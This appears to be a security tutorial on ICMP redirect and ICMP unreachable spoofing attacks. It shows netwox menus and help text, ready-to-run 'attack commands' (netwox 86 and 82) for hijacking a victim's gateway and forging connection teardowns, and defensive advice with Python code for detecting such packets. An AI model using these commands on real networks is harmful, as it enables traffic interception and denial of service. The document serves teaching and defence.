ICMP Redirect Attack
Attack principle
Posing as the gateway, the attacker sends an ICMP redirect packet to the victim host that says "your next hop for this destination is me". From then on, the victim host's traffic to that destination is redirected to the attacker, who can then intercept the data.
Note:
The attacker must assume the identity of the gateway (set the source IP address to the gateway's address, and set the new gateway to the attacker's IP address), because the victim host only obeys the gateway.
Attack process
A wants to reach B. A's next hop is normally the gateway R2, but now the attacker C sends A an ICMP redirect packet whose source IP address is the address of gateway R1 (impersonating R1) and whose forged gateway address is the attacker's IP address. When A receives the packet, it sees a message from its boss (gateway R1), which it must obey, so it changes its gateway to the attacker's IP address. From then on, whenever A accesses B, the traffic passes through C, and C can intercept the data.
The netwox tool for ICMP redirect is tool 86.
kali@kali:~$ netwox
Netwox toolbox version 5.39.0. Netwib library version 5.39.0.
######################## MAIN MENU #########################
0 - leave netwox
3 - search tools
4 - display help of one tool
5 - run a tool selecting parameters on command line
6 - run a tool selecting parameters from keyboard
a + information
b + network protocol
c + application protocol
d + sniff (capture network packets)
e + spoof (create and send packets)
f + record (file containing captured packets)
g + client
h + server
i + ping (check if a computer if reachable)
j + traceroute (obtain list of gateways)
k + scan (computer and port discovery)
l + network audit
m + brute force (check if passwords are weak)
n + remote administration
o + tools not related to network
Select a node (key in 03456abcdefghijklmno): b
##################### network protocol #####################
0 - leave netwox
1 - go to main menu
2 - go to previous menu
3 - search tools
4 - display help of one tool
5 - run a tool selecting parameters on command line
6 - run a tool selecting parameters from keyboard
a + Ethernet
b + IP
c + UDP
d + TCP
e + ICMP
f + ARP
Select a node (key in 0123456abcdef): e
########################### ICMP ###########################
0 - leave netwox
1 - go to main menu
2 - go to previous menu
3 - search tools
4 - display help of one tool
5 - run a tool selecting parameters on command line
6 - run a tool selecting parameters from keyboard
a + ICMP spoof
b + ICMP server
c + network audit using ICMP
Select a node (key in 0123456abc): c
################# network audit using ICMP #################
0 - leave netwox
1 - go to main menu
2 - go to previous menu
3 - search tools
4 - display help of one tool
5 - run a tool selecting parameters on command line
6 - run a tool selecting parameters from keyboard
a - 73:Simulate presence of a/several computer/s (arp and ping)
b - 81:Send an ICMP4 timestamp
c - 82:Sniff and send ICMP4/ICMP6 destination unreachable
d - 83:Sniff and send ICMP4/ICMP6 time exceeded
e - 84:Sniff and send ICMP4/ICMP6 parameter problem
f - 85:Sniff and send ICMP4 source quench
g - 86:Sniff and send ICMP4/ICMP6 redirect
Select a node (key in 0123456abcdefg): g
################# help for tool number 86 ##################
Title: Sniff and send ICMP4/ICMP6 redirect
+------------------------------------------------------------------------+
| This tool sends an ICMP error message when a packet matching filter |
| is sniffed. |
| Parameter --device indicates on which device to sniff. Please note |
| that under some systems, such as Windows, sniffing on some devices is |
| not supported. |
| Parameter --filter defines the sniff filter. It permits to restrict |
| captured packets. This kind of filter is named a BPF or pcap filter. |
| Basic elements of a filter are: |
| host 1.2.3.4 |
| net 192.168.10 |
| net 192.168.10.0 mask 255.255.255.0 |
| net 192.168.10.0/24 |
| port 21 |
| dst host 1.2.3.4 |
| src port 2345 |
| ether host a:b:c:d:e:f ('ether a:b:c:d:e:f' is not working) |
| ether src aa:bb:cc:dd:ee:ff |
| ip |
| arp |
| rarp |
| tcp |
| icmp |
| udp |
| Here are filter examples: |
| "host 1.2.3.4" |
| "net 192.168 and icmp" |
| "host 1.2.3.4 or dst port 80" |
| "(udp or tcp) and not host 1.2.3.4" |
| Parameter --spoofip indicates how to generate link layer for spoofing. |
| Values 'best', 'link' or 'raw' are common choices for --spoofip. Here |
| is the list of accepted values: |
| - 'raw' means to spoof at IP4/IP6 level (it uses system IP stack). If |
| a firewall is installed, or on some systems, this might not work. |
| - 'linkf' means to spoof at link level (currently, only Ethernet is |
| supported). The 'f' means to Fill source Ethernet address. |
| However, if source IP address is spoofed, it might be impossible |
| to Fill it. So, linkf will not work: use linkb or linkfb instead. |
| - 'linkb' means to spoof at link level. The 'b' means to left a Blank |
| source Ethernet address (0:0:0:0:0:0, do not try to Fill it). |
| - 'linkfb' means to spoof at link level. The 'f' means to try to Fill |
| source Ethernet address, but if it is not possible, it is left |
| Blank. |
| - 'rawlinkf' means to try 'raw', then try 'linkf' |
| - 'rawlinkb' means to try 'raw', then try 'linkb' |
| - 'rawlinkfb' means to try 'raw', then try 'linkfb' |
| - 'linkfraw' means to try 'linkf', then try 'raw' |
| - 'linkbraw' means to try 'linkb', then try 'raw' |
| - 'linkfbraw' means to try 'linkfb', then try 'raw' |
| - 'link' is an alias for 'linkfb' |
| - 'rawlink' is an alias for 'rawlinkfb' |
| - 'linkraw' is an alias for 'linkfbraw' |
| - 'best' is an alias for 'linkraw'. It should work in all cases. |
| |
| This tool may need to be run with admin privilege in order to sniff |
| and spoof. |
+------------------------------------------------------------------------+
Usage: netwox 86 [-d device] [-f filter] -g ip [-s spoofip] [-c uint32] [-i ip]
Parameters:
-d|--device device device name {Eth0}
-f|--filter filter pcap filter
-g|--gw ip new gateway {192.168.248.129}
-s|--spoofip spoofip IP spoof initialization type {linkbraw}
-c|--code uint32 ICMP code {0}
-i|--src-ip ip source IP address {192.168.248.129}
Example: netwox 86 -g "192.168.248.129"
Example: netwox 86 --gw "192.168.248.129"
Press 'r' or 'k' to run this tool, or any other key to continue
Attack command
netwox 86 -f "host 192.168.248.2" --gw "192.168.249.129" -i "192.168.249.254"
// Give the target host 192.168.248.2 a new gateway address, 192.168.248.129, sent in the name of the current gateway.
-f : the IP address of the target host to attack
--gw : the forged gateway to add, i.e. the attacker's IP address
-i : the real gateway's address
Defence
Forbid the gateway from sending redirect messages, and make hosts ignore redirect messages.
ICMP Unreachable Attack
Attack principle
The attacker forges an ICMP destination unreachable message and sends it to the victim host. It contains the IP address of the server the victim host is accessing, the destination port, the victim host's IP address, and so on.
The netwox tool for ICMP unreachable messages is tool 82.
root@kali:/home/kali# netwox
Netwox toolbox version 5.39.0. Netwib library version 5.39.0.
######################## MAIN MENU #########################
0 - leave netwox
3 - search tools
4 - display help of one tool
5 - run a tool selecting parameters on command line
6 - run a tool selecting parameters from keyboard
a + information
b + network protocol
c + application protocol
d + sniff (capture network packets)
e + spoof (create and send packets)
f + record (file containing captured packets)
g + client
h + server
i + ping (check if a computer if reachable)
j + traceroute (obtain list of gateways)
k + scan (computer and port discovery)
l + network audit
m + brute force (check if passwords are weak)
n + remote administration
o + tools not related to network
Select a node (key in 03456abcdefghijklmno): b
##################### network protocol #####################
0 - leave netwox
1 - go to main menu
2 - go to previous menu
3 - search tools
4 - display help of one tool
5 - run a tool selecting parameters on command line
6 - run a tool selecting parameters from keyboard
a + Ethernet
b + IP
c + UDP
d + TCP
e + ICMP
f + ARP
Select a node (key in 0123456abcdef): e
########################### ICMP ###########################
0 - leave netwox
1 - go to main menu
2 - go to previous menu
3 - search tools
4 - display help of one tool
5 - run a tool selecting parameters on command line
6 - run a tool selecting parameters from keyboard
a + ICMP spoof
b + ICMP server
c + network audit using ICMP
Select a node (key in 0123456abc): c
################# network audit using ICMP #################
0 - leave netwox
1 - go to main menu
2 - go to previous menu
3 - search tools
4 - display help of one tool
5 - run a tool selecting parameters on command line
6 - run a tool selecting parameters from keyboard
a - 73:Simulate presence of a/several computer/s (arp and ping)
b - 81:Send an ICMP4 timestamp
c - 82:Sniff and send ICMP4/ICMP6 destination unreachable
d - 83:Sniff and send ICMP4/ICMP6 time exceeded
e - 84:Sniff and send ICMP4/ICMP6 parameter problem
f - 85:Sniff and send ICMP4 source quench
g - 86:Sniff and send ICMP4/ICMP6 redirect
Select a node (key in 0123456abcdefg): c
################# help for tool number 82 ##################
Title: Sniff and send ICMP4/ICMP6 destination unreachable
+------------------------------------------------------------------------+
| This tool sends an ICMP error message when a packet matching filter |
| is sniffed. |
| Parameter --device indicates on which device to sniff. Please note |
| that under some systems, such as Windows, sniffing on some devices is |
| not supported. |
| Parameter --filter defines the sniff filter. It permits to restrict |
| captured packets. This kind of filter is named a BPF or pcap filter. |
| Basic elements of a filter are: |
| host 1.2.3.4 |
| net 192.168.10 |
| net 192.168.10.0 mask 255.255.255.0 |
| net 192.168.10.0/24 |
| port 21 |
| dst host 1.2.3.4 |
| src port 2345 |
| ether host a:b:c:d:e:f ('ether a:b:c:d:e:f' is not working) |
| ether src aa:bb:cc:dd:ee:ff |
| ip |
| arp |
| rarp |
| tcp |
| icmp |
| udp |
| Here are filter examples: |
| "host 1.2.3.4" |
| "net 192.168 and icmp" |
| "host 1.2.3.4 or dst port 80" |
| "(udp or tcp) and not host 1.2.3.4" |
| Parameter --spoofip indicates how to generate link layer for spoofing. |
| Values 'best', 'link' or 'raw' are common choices for --spoofip. Here |
| is the list of accepted values: |
| - 'raw' means to spoof at IP4/IP6 level (it uses system IP stack). If |
| a firewall is installed, or on some systems, this might not work. |
| - 'linkf' means to spoof at link level (currently, only Ethernet is |
| supported). The 'f' means to Fill source Ethernet address. |
| However, if source IP address is spoofed, it might be impossible |
| to Fill it. So, linkf will not work: use linkb or linkfb instead. |
| - 'linkb' means to spoof at link level. The 'b' means to left a Blank |
| source Ethernet address (0:0:0:0:0:0, do not try to Fill it). |
| - 'linkfb' means to spoof at link level. The 'f' means to try to Fill |
| source Ethernet address, but if it is not possible, it is left |
| Blank. |
| - 'rawlinkf' means to try 'raw', then try 'linkf' |
| - 'rawlinkb' means to try 'raw', then try 'linkb' |
| - 'rawlinkfb' means to try 'raw', then try 'linkfb' |
| - 'linkfraw' means to try 'linkf', then try 'raw' |
| - 'linkbraw' means to try 'linkb', then try 'raw' |
| - 'linkfbraw' means to try 'linkfb', then try 'raw' |
| - 'link' is an alias for 'linkfb' |
| - 'rawlink' is an alias for 'rawlinkfb' |
| - 'linkraw' is an alias for 'linkfbraw' |
| - 'best' is an alias for 'linkraw'. It should work in all cases. |
| |
| This tool may need to be run with admin privilege in order to sniff |
| and spoof. |
+------------------------------------------------------------------------+
Usage: netwox 82 [-d device] [-f filter] [-c uint32] [-i ip] [-s spoofip]
Parameters:
-d|--device device device name {Eth0}
-f|--filter filter pcap filter
-c|--code uint32 ICMP code {0}
-i|--src-ip ip source IP address {192.168.248.129}
-s|--spoofip spoofip IP spoof initialization type {linkbraw}
Example: netwox 82
Press 'r' or 'k' to run this tool, or any other key to continue
Attack command
netwox 82 -f "host 100.1.1.1 and port 80" -i "192.168.248.2"
// Forge an ICMP unreachable message and send it to the victim host
-f : the server's IP address, optionally with a port number
-i : the victim's IP address
Defence
Add a connection-teardown decision mechanism with multiple checks; do not rely solely on an ICMP unreachable message to conclude that the connection is lost and tear down the service.
This can only be fixed by upgrading the Linux kernel, and by developers, operating systems and applications patching the vulnerability.
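The two host-side defences above (do not honour a redirect that names an unknown next hop; do not tear down a connection on a single unreachable) as an added Python example that is not from the original post or from netwox: classify_redirect applies the RFC 1122 acceptance checks a host should make before honouring an ICMP redirect, and classify_unreachable validates the quoted header against the live connection table and treats soft error codes as non-fatal. The LAN, the gateway addresses and the two packet builders are assumptions constructed to match the page's lab addresses.

```python
import struct
from ipaddress import ip_address, ip_network

LAN = ip_network("192.168.248.0/24")      # assumed lab topology, constructed to match the page's addresses
TRUSTED_GATEWAYS = {"192.168.248.254"}    # the only routers a redirect may legitimately name (assumed)

def parse_ipv4(buf):
    """Return (src, dst, proto, payload) of a raw IPv4 datagram, honouring IHL."""
    return str(ip_address(buf[12:16])), str(ip_address(buf[16:20])), buf[9], buf[(buf[0] & 0x0F) * 4:]

def classify_redirect(pkt):
    """Decide whether an ICMP redirect (type 5) should be honoured; returns a verdict string."""
    src, _dst, proto, icmp = parse_ipv4(pkt)
    if proto != 1 or icmp[0] != 5:
        return "not a redirect"
    new_gw = str(ip_address(icmp[4:8]))
    if src not in TRUSTED_GATEWAYS:
        return f"drop: redirect not sent by a known gateway ({src})"
    if ip_address(new_gw) not in LAN:
        return f"drop: new gateway {new_gw} is off-link"
    if new_gw not in TRUSTED_GATEWAYS:  # the page's attack: src spoofed as the gateway, next hop = attacker
        return f"alert: {src} redirects traffic to unknown host {new_gw}"
    return "accept"

def classify_unreachable(pkt, live_flows):
    """Decide how a TCP stack should react to an ICMP destination unreachable (type 3)."""
    _src, _dst, proto, icmp = parse_ipv4(pkt)
    if proto != 1 or icmp[0] != 3:
        return "not an unreachable"
    isrc, idst, iproto, l4 = parse_ipv4(icmp[8:])  # quoted original header + first 8 bytes
    sport, dport = struct.unpack("!HH", l4[:4])
    if iproto != 6 or (isrc, sport, idst, dport) not in live_flows:
        return "drop: quoted header matches no live connection"
    if icmp[1] not in (2, 3):  # RFC 1122 4.2.3.9: codes 0, 1, 5 are soft errors; 2 and 3 are hard
        return f"keep: code {icmp[1]} is a soft error, connection stays up"
    return f"abort candidate: hard error code {icmp[1]} on a live flow"

def ipv4(src, dst, proto, payload):
    """Build a minimal IPv4 datagram for constructed test traffic (checksum left zero)."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0, 64, proto, 0,
                      ip_address(src).packed, ip_address(dst).packed)
    return hdr + payload

def spoofed_redirect(attacker, victim, gateway):
    """Shape of the netwox 86 packet: outer src = real gateway, gateway field = attacker (constructed)."""
    quoted = ipv4(victim, "100.1.1.1", 6, b"\x00" * 8)
    return ipv4(gateway, victim, 1, struct.pack("!BBH4s", 5, 1, 0, ip_address(attacker).packed) + quoted)

def spoofed_unreachable(victim, server, port, code=0):
    """Shape of the netwox 82 packet: quotes the victim's own TCP header back at it (constructed)."""
    quoted = ipv4(victim, server, 6, struct.pack("!HH", 40000, port) + b"\x00" * 4)
    return ipv4("192.168.248.1", victim, 1, struct.pack("!BBHI", 3, code, 0, 0) + quoted)
```

On Linux the redirect policy is enforced host-wide with sysctl net.ipv4.conf.all.accept_redirects=0 (and send_redirects=0 on routers), which removes the need to inspect redirects at all.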